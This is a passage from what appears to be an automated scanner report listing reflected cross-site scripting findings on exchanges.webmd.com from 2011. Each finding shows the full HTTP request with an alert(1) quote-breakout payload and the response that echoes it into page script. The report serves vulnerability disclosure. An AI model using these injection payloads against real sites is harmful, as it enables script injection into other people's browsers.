Path:   /webmd-exchanges/health-experts

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f697'-alert(1)-'fa1f5d7ac38 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/health-experts4f697'-alert(1)-'fa1f5d7ac38 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59521
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp3
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:14 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
ID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges%252fhealth-experts4f697'-alert(1)-'fa1f5d7ac38&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.28. http://exchanges.webmd.com/webmd-exchanges/health-experts [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/health-experts

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8af3'-alert(1)-'a912fc71e69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/health-experts?d8af3'-alert(1)-'a912fc71e69=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 139321
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:50 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
md.com/html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=1680&sec=&au1=&au2=&uri=%2fwebmd-exchanges%2fhealth-experts%3fd8af3'-alert(1)-'a912fc71e69%3d1&artid=091e9c5e80471487&inst=0&amp;leaf=">
...[SNIP]...

1.29. http://exchanges.webmd.com/webmd-exchanges/health-experts [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/health-experts

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5de1a"-alert(1)-"91ad6104c69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/health-experts?5de1a"-alert(1)-"91ad6104c69=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 139339
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:49 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<script language="javascript" type="text/javascript"> var s_furl="/webmd-exchanges/health-experts?5de1a"-alert(1)-"91ad6104c69=1"; var s_sponsor_program=""; var s_sensitive="false"; var image_server_url="http://img.webmd.com/dtmcms/live"; var space_id=""; var space_title=""; var space_name=""; var space_type=""; var space_sit
...[SNIP]...

1.30. http://exchanges.webmd.com/webmd-exchanges/mens-health-exchanges [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/mens-health-exchanges

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8a7d'-alert(1)-'2bc8179e737 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchangese8a7d'-alert(1)-'2bc8179e737/mens-health-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59542
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:23 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchangese8a7d'-alert(1)-'2bc8179e737%252fmens-health-exchanges&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.31. http://exchanges.webmd.com/webmd-exchanges/mens-health-exchanges [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/mens-health-exchanges

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4329c'-alert(1)-'267b3d24388 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/mens-health-exchanges4329c'-alert(1)-'267b3d24388 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59542
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:34 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
ansID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges%252fmens-health-exchanges4329c'-alert(1)-'267b3d24388&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.32. http://exchanges.webmd.com/webmd-exchanges/mens-health-exchanges [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/mens-health-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b409b"-alert(1)-"5b935ffdb1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/mens-health-exchanges?b409b"-alert(1)-"5b935ffdb1e=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67583
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp1
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:08 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<script language="javascript" type="text/javascript"> var s_furl="/webmd-exchanges/mens-health-exchanges?b409b"-alert(1)-"5b935ffdb1e=1"; var s_sponsor_program=""; var s_sensitive="false"; var image_server_url="http://img.webmd.com/dtmcms/live"; var space_id=""; var space_title=""; var space_name=""; var space_type=""; var space_sit
...[SNIP]...

1.33. http://exchanges.webmd.com/webmd-exchanges/mens-health-exchanges [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/mens-health-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a9c9'-alert(1)-'2ea3574cdc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/mens-health-exchanges?4a9c9'-alert(1)-'2ea3574cdc6=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67571
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:10 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
ransactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=3552&sec=8000|8001&au1=&au2=&uri=%2fwebmd-exchanges%2fmens-health-exchanges%3f4a9c9'-alert(1)-'2ea3574cdc6%3d1&artid=091e9c5e805cc663&inst=0&amp;leaf=">
...[SNIP]...

1.34. http://exchanges.webmd.com/webmd-exchanges/mental-health-exchanges [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/mental-health-exchanges

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c74f6'-alert(1)-'e9209004a68 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchangesc74f6'-alert(1)-'e9209004a68/mental-health-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59548
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:10 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchangesc74f6'-alert(1)-'e9209004a68%252fmental-health-exchanges&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.35. http://exchanges.webmd.com/webmd-exchanges/mental-health-exchanges [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/mental-health-exchanges

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d42e3'-alert(1)-'cbdce0ced1c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/mental-health-exchangesd42e3'-alert(1)-'cbdce0ced1c HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59548
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:21 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
sID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges%252fmental-health-exchangesd42e3'-alert(1)-'cbdce0ced1c&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.36. http://exchanges.webmd.com/webmd-exchanges/mental-health-exchanges [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/mental-health-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbecd"-alert(1)-"9e03d84b4ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/mental-health-exchanges?dbecd"-alert(1)-"9e03d84b4ea=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70718
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:56 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<script language="javascript" type="text/javascript"> var s_furl="/webmd-exchanges/mental-health-exchanges?dbecd"-alert(1)-"9e03d84b4ea=1"; var s_sponsor_program=""; var s_sensitive="false"; var image_server_url="http://img.webmd.com/dtmcms/live"; var space_id=""; var space_title=""; var space_name=""; var space_type=""; var space_sit
...[SNIP]...

1.37. http://exchanges.webmd.com/webmd-exchanges/mental-health-exchanges [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/mental-health-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 262b4'-alert(1)-'188039677da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/mental-health-exchanges?262b4'-alert(1)-'188039677da=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70702
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:57 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
nsactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=3552&sec=8000|8001&au1=&au2=&uri=%2fwebmd-exchanges%2fmental-health-exchanges%3f262b4'-alert(1)-'188039677da%3d1&artid=091e9c5e805cc029&inst=0&amp;leaf=">
...[SNIP]...

1.38. http://exchanges.webmd.com/webmd-exchanges/parenting-exchanges [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/parenting-exchanges

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3538e'-alert(1)-'849fcdc23ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges3538e'-alert(1)-'849fcdc23ec/parenting-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59536
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:39 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges3538e'-alert(1)-'849fcdc23ec%252fparenting-exchanges&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.39. http://exchanges.webmd.com/webmd-exchanges/parenting-exchanges [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/parenting-exchanges

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2743a'-alert(1)-'382aab0a04 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/parenting-exchanges2743a'-alert(1)-'382aab0a04 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59533
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:52 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges%252fparenting-exchanges2743a'-alert(1)-'382aab0a04&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.40. http://exchanges.webmd.com/webmd-exchanges/parenting-exchanges [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/parenting-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6671e'-alert(1)-'9922d39748e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/parenting-exchanges?6671e'-alert(1)-'9922d39748e=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 78864
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp3
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:25 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=3552&sec=8000|8001&au1=&au2=&uri=%2fwebmd-exchanges%2fparenting-exchanges%3f6671e'-alert(1)-'9922d39748e%3d1&artid=091e9c5e8055d4d0&inst=0&amp;leaf=">
...[SNIP]...

1.41. http://exchanges.webmd.com/webmd-exchanges/parenting-exchanges [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/parenting-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2785"-alert(1)-"fced948cb12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/parenting-exchanges?f2785"-alert(1)-"fced948cb12=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 78876
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp3
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:23 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<script language="javascript" type="text/javascript"> var s_furl="/webmd-exchanges/parenting-exchanges?f2785"-alert(1)-"fced948cb12=1"; var s_sponsor_program=""; var s_sensitive="false"; var image_server_url="http://img.webmd.com/dtmcms/live"; var space_id=""; var space_title=""; var space_name=""; var space_type=""; var space_sit
...[SNIP]...

1.42. http://exchanges.webmd.com/webmd-exchanges/pregnancy-exchanges [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
